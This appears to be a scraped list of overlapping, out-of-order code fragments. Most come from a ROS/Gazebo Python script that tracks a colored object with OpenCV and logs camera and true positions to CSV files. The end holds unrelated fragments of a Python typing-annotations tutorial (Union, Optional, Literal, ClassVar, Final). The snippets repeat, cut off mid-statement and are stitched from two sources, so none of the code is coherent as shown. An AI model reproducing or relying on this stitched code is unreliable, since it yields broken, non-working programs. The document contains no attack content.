centroid.point.x = cX - 160 centroid.point.y =", "= 0 roll = 0 pitch = 0 yaw = 0 def models_cb(msg):", "ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y =", "rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX,", "127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key ==", "127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask,", "/ FW / 180.0 * math.pi KY = FOVY / FH / 180.0", "FOVX / FW / 180.0 * math.pi KY = FOVY / FH /", "rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time()", "rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state =", "msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global", "out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) *", "%.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\",", "from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from", "cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\",", "220) upper_threshold = (180, 230, 255) FW = 320 FH = 240 FOVX", "import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255) FW", "pitch, yaw x_ = math.tan(KX * x - roll) * z y_ =", "pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose", "KX = FOVX / FW / 180.0 * math.pi KY = FOVY /", "__name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub =", "Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state',", "is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps =", "+ 0.1 * 1 / (time.time() - t) t = time.time() rate.sleep() except", "not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid:", "+ roll) * z # y_ = math.tan(KY * y + pitch -", "rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub =", "model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5", "y - pitch) * z # x_ = math.tan(KX * x + roll)", "cX - 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp =", "import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import", "* x - roll) * z y_ = math.tan(KY * y - pitch)", "out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS", "cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y", "pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd =", "= rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid =", "160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid)", "Position Y']) waktu = rospy.Time(0) pose = Pose() z = 0 roll =", "# if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\"", "cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230),", "from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from", "27: break fps = 0.9 * fps + 0.1 * 1 / (time.time()", "rospy.Time(0) pose = Pose() z = 0 roll = 0 pitch = 0", "-centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY:", "'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position", "SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point", "% fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask)", "= open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv)", "cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x +", "cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states',", "Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose", "centroid.point.x = cX - 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y", "FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv =", "z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw)", "Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time',", "* x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ - math.sin(yaw)", "= 30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap =", "roll = 0 pitch = 0 yaw = 0 def models_cb(msg): global pose,", "cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break fps = 0.9", "= 0.9 * fps + 0.1 * 1 / (time.time() - t) t", "- math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_", "set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127,", "= euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw", "X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu =", "= 48.8 KX = FOVX / FW / 180.0 * math.pi KY =", "as cv import rospy import time import math from geometry_msgs.msg import PointStamped from", "= -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f;", "(cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y", "msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x,", "(180, 230, 255) FW = 320 FH = 240 FOVX = 62.2 FOVY", "if key == 27: break fps = 0.9 * fps + 0.1 *", "2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27:", "real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001", "X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap,", "model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for", "pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break", "ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1)", "geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations", "def trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX * x", "real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position", "PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY - 120 centroid.point.y =", "x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\": try:", "import Camera from color_detection import ColorDetection import cv2 as cv import rospy import", "real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1)", "230, 255) FW = 320 FH = 240 FOVX = 62.2 FOVY =", "Position X', 'Real Position Y']) waktu = rospy.Time(0) pose = Pose() z =", "import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from", "capture..\") frame = cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame", "-1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) #", "cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX - 160", "try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5)", "0.9 * fps + 0.1 * 1 / (time.time() - t) t =", "FW / 180.0 * math.pi KY = FOVY / FH / 180.0 *", "cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps,", "0 yaw = 0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu", "Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu", "z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x =", "csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255) FW =", "= rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x", "rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point,", "mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x", "pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y +", "tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold =", "pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose =", "fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key", "t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not None: cap.close()", "yaw x_ = math.tan(KX * x - roll) * z y_ = math.tan(KY", "= rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state", "* z y_ = math.tan(KY * y - pitch) * z # x_", "centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX:", "cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1)", "roll, pitch, yaw x_ = math.tan(KX * x - roll) * z y_", "fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap", "FH = 240 FOVX = 62.2 FOVY = 48.8 KX = FOVX /", "models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z =", "= Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x,", "z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) =", "y): global z, roll, pitch, yaw x_ = math.tan(KX * x - roll)", "+ 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if", "time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not None: cap.close() cv.destroyAllWindows() cam_csv.close()", "'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu = rospy.Time(0)", "= cd.centroid centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY", "= rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real',", "'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam", "cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y',", "pitch = 0 yaw = 0 def models_cb(msg): global pose, z, roll, pitch,", "math.tan(KY * y - pitch) * z # x_ = math.tan(KX * x", "x - roll) * z y_ = math.tan(KY * y - pitch) *", "-1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)", "0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" %", "queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState()", "= FOVY / FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv',", "break fps = 0.9 * fps + 0.1 * 1 / (time.time() -", "y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y)", "0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x", "lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255) FW = 320", "= 320 FH = 240 FOVX = 62.2 FOVY = 48.8 KX =", "z, roll, pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list =", "and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t", "X', 'Real Position Y']) waktu = rospy.Time(0) pose = Pose() z = 0", "= 240 FOVX = 62.2 FOVY = 48.8 KX = FOVX / FW", "= rospy.Time(0) pose = Pose() z = 0 roll = 0 pitch =", "from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from", "= Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture()", "model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap =", "* z # y_ = math.tan(KY * y + pitch - 1.57079632679) *", "real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose = Pose()", "= cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x =", "% fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask,", "fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid,", "t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid", "rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped()", "* math.pi KY = FOVY / FH / 180.0 * math.pi # CSV", "'Real Position Y']) waktu = rospy.Time(0) pose = Pose() z = 0 roll", "= time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not None: cap.close() cv.destroyAllWindows()", "pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y,", "pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list", "roll) * z y_ = math.tan(KY * y - pitch) * z #", "= Pose() z = 0 roll = 0 pitch = 0 yaw =", "cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x,", "0.1 * 1 / (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException:", "centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X,", "240 FOVX = 62.2 FOVY = 48.8 KX = FOVX / FW /", "from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler", "from vision.camera import Camera from color_detection import ColorDetection import cv2 as cv import", "= cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) =", "waktu = rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw x_ =", "pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y])", "= t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X", "euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw x_", "= ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model)", "= msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list)", "48.8 KX = FOVX / FW / 180.0 * math.pi KY = FOVY", "-math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ -", "ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose", "FOVX = 62.2 FOVY = 48.8 KX = FOVX / FW / 180.0", "- 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap", "rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y", "= pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5:", "rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10)", "= (160, 190, 220) upper_threshold = (180, 230, 255) FW = 320 FH", "frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break fps", "= -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera", "cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230),", "230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127,", "FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub =", "fps = 0.9 * fps + 0.1 * 1 / (time.time() - t)", "320 FH = 240 FOVX = 62.2 FOVY = 48.8 KX = FOVX", "import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import", "import ta_vision from vision.camera import Camera from color_detection import ColorDetection import cv2 as", "cv import rospy import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg", "-0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait", "255) FW = 320 FH = 240 FOVX = 62.2 FOVY = 48.8", "math.tan(KY * y + pitch - 1.57079632679) * z out_x = -math.sin(yaw) *", "msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y):", "pitch) * z # x_ = math.tan(KX * x + roll) * z", "180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w')", "y_ = math.tan(KY * y - pitch) * z # x_ = math.tan(KX", "= cX - 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp", "rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub", "fps + 0.1 * 1 / (time.time() - t) t = time.time() rate.sleep()", "math.tan(KX * x - roll) * z y_ = math.tan(KY * y -", "mask) key = cv.waitKey(15) if key == 27: break fps = 0.9 *", "time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame)", "* x + roll) * z # y_ = math.tan(KY * y +", "msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu", "break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps,", "+ pitch - 1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw)", "X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real", "Pose() z = 0 roll = 0 pitch = 0 yaw = 0", "math.tan(KX * x + roll) * z # y_ = math.tan(KY * y", "\"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) #", "roll, pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x,", "math.pi KY = FOVY / FH / 180.0 * math.pi # CSV cam_csv", "# x_ = math.tan(KX * x + roll) * z # y_ =", "math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate", "math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return", "Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose =", ">= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\"", "import ColorDetection import cv2 as cv import rospy import time import math from", "csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real", "rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while", "230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15)", "trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos", "120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y)", "= csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time',", "Y']) waktu = rospy.Time(0) pose = Pose() z = 0 roll = 0", "centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY - 120", "rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX *", "CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer", "if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240,", "= math.tan(KY * y + pitch - 1.57079632679) * z out_x = -math.sin(yaw)", "pitch - 1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw) *", "/ 180.0 * math.pi KY = FOVY / FH / 180.0 * math.pi" ]
[ "if a == b: return True elif a < b: return -1 elif", "ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"}", "return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo", "Tuple, Union # This a tuple defined with variable lenght def print_tuple(data: Tuple[Any,", "defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a:", "{err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return", "[1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr)", "ClassVar, Final, List, Literal, Optional, Tuple, Union # This a tuple defined with", "with open(file, mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars:", "elif a > b: return +1 else: return False except Exception as err:", "a > b: return +1 else: return False except Exception as err: return", "= 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: # TIMEOUT:", "{} # print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} #", "open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as", "typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) #", "a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data)", "int]] = {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict", "b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \", b\"bar \")", "# TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def", "def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \",", "AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \")", "test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return None return", "if name is None: return None return f\"Hello {name}\" def test_callable(func: Callable, name:", "print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this is", "fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict = {} #", "test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file,", "10} # Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1", "WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars:", "return False except Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str]", "mode == 'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w':", "{\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars()", "# class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) ->", "class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr:", "print(data) def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try:", "float]) -> Union[bool, int, str]: try: if a == b: return True elif", "= WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class", "AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \",", "elif a < b: return -1 elif a > b: return +1 else:", "= None) -> Optional[str]: if name is None: return None return f\"Hello {name}\"", "None return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional,", "b: return +1 else: return False except Exception as err: return f\"Error -", "None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if", "Union # This a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...])", "List, Literal, Optional, Tuple, Union # This a tuple defined with variable lenght", "None) -> Optional[str]: if name is None: return None return f\"Hello {name}\" def", "print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int, float])", "Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: #", "a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \",", "def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str,", "Connection: # 